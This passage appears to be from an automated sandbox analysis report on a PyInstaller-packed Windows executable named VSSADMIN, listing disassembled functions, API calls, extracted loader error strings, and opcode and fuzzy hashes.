                                                                                                                                                                      • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_NormalizeException$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleStringFlags$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for PyUnicode_Join$Failed to get address for PyUnicode_Replace$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_UTF8Mode$Failed to get address for Py_UnbufferedStdioFlag$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleStringFlags$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_UTF8Mode$Py_UnbufferedStdioFlag$Py_VerboseFlag
                                                                                                                                                                      • API String ID: 190572456-3109299426
                                                                                                                                                                      • Opcode ID: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                      • Instruction ID: 820fcf5087af11d6701d077da3f7f76edcc49149595e5afffe47fb918676a7f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5338f17e9a06305e3f6e0c00f43c9f2351ab77f2791f85b3366b77a8fa4fe8
                                                                                                                                                                      • Instruction Fuzzy Hash: 46423564A0EF47B2EE558B08E9D117422B2BF46FB9B946037C40E87364FF7EA559C200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71B90 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 188windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                                                                                                                                      • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                                                                                                                                      • API String ID: 2446303242-1601438679
                                                                                                                                                                      • Opcode ID: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                      • Instruction ID: 801b439429b27baf6ecd1df9797fe4a70b957b65cb2c3ca371bbec845ee868d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 459a4d17a5d9d63fd32af7de9d21940b0e91a324c601fae87eb48516cdd5ea8c
                                                                                                                                                                      • Instruction Fuzzy Hash: 90A16A36218F8197E7148F26E58479AB370F789BA4F50412AEB8D43B24CF3EE165CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C931FC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                      • API String ID: 808467561-2761157908
                                                                                                                                                                      • Opcode ID: ccfbaf94e8ba692c66e947d25492209142ad6238170979dce7e9a2c25c803b1f
                                                                                                                                                                      • Instruction ID: fc8279f79a9a551023f1d5c2b5113e7b0bcae5d93e2a73def3c3cd29608f95ea
                                                                                                                                                                      • Opcode Fuzzy Hash: ccfbaf94e8ba692c66e947d25492209142ad6238170979dce7e9a2c25c803b1f
                                                                                                                                                                      • Instruction Fuzzy Hash: 51B2F672A18A829BE7258E64D4807FD77B1FB49B5CF406136DA0E97A94DF39E900CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C774E0 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 52windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00007FF614C7269E,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C77507
                                                                                                                                                                      • FormatMessageW.KERNEL32 ref: 00007FF614C77536
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 00007FF614C7758C
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF614C77774,?,?,?,?,?,?,?,?,?,?,?,00007FF614C7101D), ref: 00007FF614C72654
                                                                                                                                                                        • Part of subcall function 00007FF614C72620: MessageBoxW.USER32 ref: 00007FF614C72730
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastMessage$ByteCharFormatMultiWide
                                                                                                                                                                      • String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$No error messages generated.$PyInstallem: FormatMessageW failed.$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
                                                                                                                                                                      • API String ID: 2920928814-3505189403
                                                                                                                                                                      • Opcode ID: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
                                                                                                                                                                      • Instruction ID: 9e498f8d3759ac16d0be59944cde15ce73329b611ef7225304972c15ac2f5965
                                                                                                                                                                      • Opcode Fuzzy Hash: 029f836fef8ee5472c7679535fa4ba659228b0cadb04ffc4aa2330943ac4ddf3
                                                                                                                                                                      • Instruction Fuzzy Hash: DE217F31A0CE4792EB609B14E8C42B672B5FB4ABA9F844037E54EC36A4EF7DE505C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B6CC Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                      • Instruction ID: f8043513b5143111166cb1be153dfde0e0a9889e6b983e9f6b1439ac5fa07e28
                                                                                                                                                                      • Opcode Fuzzy Hash: ed99729a06427ffe8919d80707f0d22f85e2a1f7f16501b693ecc562f35910ed
                                                                                                                                                                      • Instruction Fuzzy Hash: FD314D76608E8196EB608F64E8803E97371FB85B58F44403ADB4D87A98EF3DD648C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C89B14 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                      • Instruction ID: 0a12bd7df231abbe741c659f4b0952ab2586f86e3b7f15c9633988d0bca6aba2
                                                                                                                                                                      • Opcode Fuzzy Hash: be108ae6727a529d83f8885eb47159bd80851fd8c8093c6f980a4c1e93935562
                                                                                                                                                                      • Instruction Fuzzy Hash: 67314136618F8196DB64CB25E8802EE73B4FB85B68F500136EA9D83B95DF3DD545C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C909E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                      • Opcode ID: 19aa5fc60aa927df0bce9d38497bbf586f0f8b4e80b2d1e9978e290f43184bb9
                                                                                                                                                                      • Instruction ID: 962ff6a41b4d55d3988710cef1e5ff54d8f6c494a582aed03bfcb54f23ff9a01
                                                                                                                                                                      • Opcode Fuzzy Hash: 19aa5fc60aa927df0bce9d38497bbf586f0f8b4e80b2d1e9978e290f43184bb9
                                                                                                                                                                      • Instruction Fuzzy Hash: FFB1B562B19E9651EA609B26D4806BA63B1EB46FF8F444133EE5D87B85DF3DE441C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B5B0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                      • Opcode ID: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
                                                                                                                                                                      • Instruction ID: 7f69d9357170e07e26837de23a0613233fc01596517e9ceb7176968b1c8b03d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f2ab88599309ed85d1430460dcf5b5c4b0e5279fe268d41b3c0937ed12eb80b
                                                                                                                                                                      • Instruction Fuzzy Hash: D3113326B14F419AEF00CF64E8942B933B4FB19B68F440D32EA6D87764EF79D1958380
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C92D60 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                      • Instruction ID: c27b1394e6e669b57e37106fe4829224cf80bbe4eb29b6194d7c41afc32d0927
                                                                                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                      • Instruction Fuzzy Hash: 7BC11672B18A8697D734CF15E08466AB7A1F789B98F049136DB4E83794DF3EE901CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C98B98 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 15204871-0
                                                                                                                                                                      • Opcode ID: 100244ad11a5ca47b3e63d731413f73159be8c16d425433171175cfe94e11ddb
                                                                                                                                                                      • Instruction ID: b8acbb6162d10366901cdd0d9b1533c4008b126081ed739b632de1c7b5791c06
                                                                                                                                                                      • Opcode Fuzzy Hash: 100244ad11a5ca47b3e63d731413f73159be8c16d425433171175cfe94e11ddb
                                                                                                                                                                      • Instruction Fuzzy Hash: 55B13577614B89CAEB158F29C8863693BB0F745F5CF188922DA5D837A4CF3AD451C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77850 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                      • Opcode ID: 0e172d7ea5e890d92c6a2989d53da8e3c55f614dc17c23923d45aaf4937351c2
                                                                                                                                                                      • Instruction ID: 7a90dff0425b99d7fa43c8e9694379d4cdd68b11326e0157d5277d388f322468
                                                                                                                                                                      • Opcode Fuzzy Hash: 0e172d7ea5e890d92c6a2989d53da8e3c55f614dc17c23923d45aaf4937351c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 31F08122A1DB8587EB608F64F4C47AA73A0BB85B35F044237D66D436E4DF3CE009CA00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C82C34 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $
                                                                                                                                                                      • API String ID: 0-227171996
                                                                                                                                                                      • Opcode ID: f5e1524899c56bc23ad3890ea476fd64461aaca1c1c6cf088a54164d3a5803aa
                                                                                                                                                                      • Instruction ID: 7cab06bb68594b722589de0c420e2e1c1f8acb2280fb5f47fa61ea83a101d9a3
                                                                                                                                                                      • Opcode Fuzzy Hash: f5e1524899c56bc23ad3890ea476fd64461aaca1c1c6cf088a54164d3a5803aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 60E1B376A08E0385EB688B2580D813937B1FF46F68F145137DA4E877E5DF2AE841E340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8D0C8 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                      • API String ID: 0-3030954782
                                                                                                                                                                      • Opcode ID: fc16f48a51adf8395f54aceaf0b9db76d004ae62db191d73de727a3be8067e6d
                                                                                                                                                                      • Instruction ID: 93ea8effb002646adbc555d1b98ea723702f5f3539a69c87115bd7fdcd6d210f
                                                                                                                                                                      • Opcode Fuzzy Hash: fc16f48a51adf8395f54aceaf0b9db76d004ae62db191d73de727a3be8067e6d
                                                                                                                                                                      • Instruction Fuzzy Hash: AA515966B18AD686E7248A35D8807696BA1EB46FB4F489232CB6887AD5CF3DD4418700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8FA38 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
